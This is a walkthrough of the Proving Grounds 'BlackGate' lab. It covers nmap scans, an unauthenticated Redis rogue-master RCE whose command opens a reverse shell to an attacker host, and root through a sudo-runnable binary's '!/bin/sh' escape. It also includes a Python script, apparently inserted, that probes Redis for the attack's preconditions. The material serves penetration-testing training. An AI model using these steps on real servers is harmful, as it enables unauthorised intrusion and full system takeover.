PG - BlackGate

In this walkthrough we will go through the BlackGate machine from Proving Grounds. It is rated Hard on the platform and consists of an unauthenticated Redis RCE (using a rogue master server) to get an initial shell, followed by abuse of a sudo-runnable redis-status binary to get root. So, let's get started without any delay.

Machine Info:

Title: BlackGate
IP address: 192.168.195.176
Difficulty: Hard
OS: Linux
Description: BlackGate is a Hard Linux machine that requires Redis server RCE exploitation to get an initial shell, followed by exploitation of the redis-status binary to get root.

Enumeration:

  • I started off with a regular nmap aggressive scan (-A, default top 1000 ports). The output below shows only 22/tcp (SSH) open, with 53/tcp filtered; the full port sweep that follows also turned up 6379/tcp (Redis). So the attack surface is two services: SSH and Redis.

$ sudo nmap -A 192.168.195.176
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-18 11:22 IST

Nmap scan report for 192.168.195.176
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 8.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.3p1: 
|     	CVE-2020-15778	6.8	https://vulners.com/cve/CVE-2020-15778
|     	C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	6.8	https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	*EXPLOIT*
|     	10213DBE-F683-58BB-B6D3-353173626207	6.8	https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207	*EXPLOIT*
|     	PRION:CVE-2016-20012	5.0	https://vulners.com/prion/PRION:CVE-2016-20012
|     	PRION:CVE-2021-28041	4.6	https://vulners.com/prion/PRION:CVE-2021-28041
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	PRION:CVE-2020-15778	4.4	https://vulners.com/prion/PRION:CVE-2020-15778
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	PRION:CVE-2020-14145	4.3	https://vulners.com/prion/PRION:CVE-2020-14145
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|     	PRION:CVE-2021-41617	3.5	https://vulners.com/prion/PRION:CVE-2021-41617
|     	PRION:CVE-2021-36368	2.6	https://vulners.com/prion/PRION:CVE-2021-36368
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
53/tcp filtered domain
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/18%OT=22%CT=1%CU=39821%PV=Y%DS=4%DC=T%G=Y%TM=65A8BCB
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%II=I%TS=A)OPS(O1=M
OS:54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%
OS:O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%
OS:DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=6E
OS:21%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   205.15 ms 192.168.45.1
2   205.11 ms 192.168.45.254
3   205.77 ms 192.168.251.1
4   205.86 ms 192.168.195.176

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.33 seconds

nmap scan

sudo nmap -sS -p- -T5 192.168.195.176

all port scan

  • Enumerating Redis with the nmap NSE scripts revealed the version in use: 4.0.14. The redis-info script only gets its data if the instance answers INFO without authentication, so a populated result here already tells us the server is open to anonymous clients.

sudo nmap --script redis-info,redis-brute -p 6379 192.168.195.176

redis Enumeration

Initial Access:

  • Next, I looked online for exploits against this version and found the Redis rogue server technique. Because the instance accepts unauthenticated commands, an attacker can set dbfilename with CONFIG SET, point the server at a fake master with SLAVEOF, push a malicious module as the replicated "RDB" payload, and load it with MODULE LOAD, which gives command execution and a reverse shell.

./redis-rogue-server.py --rhost 192.168.195.176 --lhost 192.168.45.156

Redis Rogue Server exploit

got initial access
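Before firing the rogue-server script it is worth confirming the preconditions it relies on: no AUTH, no protected mode, and the CONFIG, SLAVEOF and MODULE commands still present (a hardened redis.conf renames them away with rename-command). The following pre-flight check is an added example written for this walkthrough, not code from the original post or from redis-rogue-server. It speaks raw RESP so it needs no redis-cli; the SAMPLE_REPLIES data is constructed to resemble what an unauthenticated Redis 4.0.14 would answer, and the host/port handed to probe() are assumptions.

```python
"""Pre-flight check for the Redis rogue-server technique (CONFIG SET dbfilename,
SLAVEOF to an attacker-controlled master, MODULE LOAD of the pushed .so).
Added example, not code from the original post or from redis-rogue-server.
SAMPLE_REPLIES is constructed to resemble an unauthenticated Redis 4.0.14;
host/port passed to probe() are assumptions."""
import socket


class Incomplete(Exception):
    """The buffer does not yet hold a complete RESP reply."""

def resp_command(*args: str) -> bytes:
    """Encode a command as a RESP array, the same bytes redis-cli puts on the wire."""
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)

def parse_resp(buf: bytes):
    """Decode one RESP reply; return (value, unread_bytes).
    Error replies become ('error', message) so callers can tell them apart."""
    kind, body = buf[:1], buf[1:]
    line, sep, rest = body.partition(b"\r\n")
    if not sep:
        raise Incomplete
    if kind == b"+":
        return line.decode(), rest
    if kind == b"-":
        return ("error", line.decode()), rest
    if kind == b":":
        return int(line), rest
    if kind == b"$":
        size = int(line)
        if size < 0:                       # null bulk string
            return None, rest
        if len(rest) < size + 2:
            raise Incomplete
        return rest[:size].decode(), rest[size + 2:]
    if kind == b"*":
        items = []
        for _ in range(int(line)):
            item, rest = parse_resp(rest)
            items.append(item)
        return items, rest
    raise ValueError(f"unexpected RESP prefix {kind!r}")

def parse_info(text: str) -> dict:
    """Turn the key:value body of INFO into a dict, skipping '# Section' lines."""
    info = {}
    for line in text.splitlines():
        if line and not line.startswith("#") and ":" in line:
            key, _, value = line.partition(":")
            info[key.strip()] = value.strip()
    return info

def is_error(reply, needle: str = "") -> bool:
    return (isinstance(reply, tuple) and reply[0] == "error"
            and needle.lower() in reply[1].lower())

def assess(replies: dict) -> list:
    """Map decoded replies to the preconditions the rogue-server chain needs.
    A bare SLAVEOF (no arguments) is sent on purpose: 'wrong number of
    arguments' proves the command exists, 'unknown command' means it was
    renamed away with rename-command."""
    if is_error(replies["PING"], "NOAUTH"):
        return ["AUTH required: unauthenticated rogue server will not work"]
    if is_error(replies["PING"], "DENIED"):
        return ["protected mode: remote clients are refused"]
    ver = parse_info(replies["INFO"]).get("redis_version", "?")
    note = (" (4.x/5.x, the range redis-rogue-server's module targets)"
            if ver.split(".")[0] in ("4", "5") else "")
    findings = [f"version {ver}{note}"]
    for name in ("MODULE LIST", "CONFIG GET dir", "SLAVEOF"):
        state = ("renamed/disabled" if is_error(replies[name], "unknown command")
                 else "available")
        findings.append(f"{name.split()[0]} command {state}")
    return findings

def probe(host: str, port: int = 6379, timeout: float = 5.0) -> list:
    """Run the same checks against a live target (host/port are assumptions)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        def ask(*cmd):
            sock.sendall(resp_command(*cmd))
            buf = b""
            while True:
                chunk = sock.recv(65536)
                if not chunk:
                    raise ConnectionError("server closed the connection")
                buf += chunk
                try:
                    return parse_resp(buf)[0]
                except Incomplete:
                    continue
        return assess({
            "PING": ask("PING"),
            "INFO": ask("INFO"),
            "MODULE LIST": ask("MODULE", "LIST"),
            "CONFIG GET dir": ask("CONFIG", "GET", "dir"),
            "SLAVEOF": ask("SLAVEOF"),
        })

SAMPLE_REPLIES = {  # constructed: what an unauthenticated 4.0.14 would answer
    "PING": "PONG",
    "INFO": "# Server\r\nredis_version:4.0.14\r\nos:Linux x86_64\r\n"
            "# Replication\r\nrole:master\r\n",
    "MODULE LIST": [],
    "CONFIG GET dir": ["dir", "/var/lib/redis"],
    "SLAVEOF": ("error", "ERR wrong number of arguments for 'slaveof' command"),
}
```

Run `probe("192.168.195.176")` against the lab box to get the live verdict, or `assess(SAMPLE_REPLIES)` to see the shape of the output offline. Any finding of "renamed/disabled" or an AUTH/protected-mode line means the public script will fail at that step, and the MODULE check in particular is the one most hardened deployments break.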

  • Captured the local flag.

local flag

Privilege Escalation:

  • Moving on, I ran LinPEAS on the target to enumerate potential privilege escalation vectors and found that the redis-status binary can be run as root with sudo (confirmed with sudo -l).

sudo -l

Wrong Authorization key

  • Running the binary without the right key just fails with "Wrong Authorization key", so I dumped its printable strings with `strings`. That revealed a hardcoded value that looks like the authorization key redis-status expects.

strings /usr/local/bin/redis-status

Got Authorization key

  • I ran the binary via sudo and supplied the recovered authorization key. After it prints the service status it pauses at an interactive prompt; typing the `!/bin/sh` shell escape at that prompt spawns a shell, and since the binary is running as root, so does the shell.

sudo /usr/local/bin/redis-status

!/bin/sh

redis-status service running

  • Finally captured the root flag to complete the challenge.

root flag

Conclusion:

So that was BlackGate for you. We started off with a regular nmap scan and found only two ports open, 22 (SSH) and 6379 (Redis). We enumerated the Redis service and found that the version running is 4.0.14. Looking online for known exploits showed that an unauthenticated instance of this version is vulnerable to the Redis rogue server RCE technique. We got access using that exploit and performed post-compromise enumeration with LinPEAS, which turned up a redis-status binary we could run with sudo; we abused it to get root on the system. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".
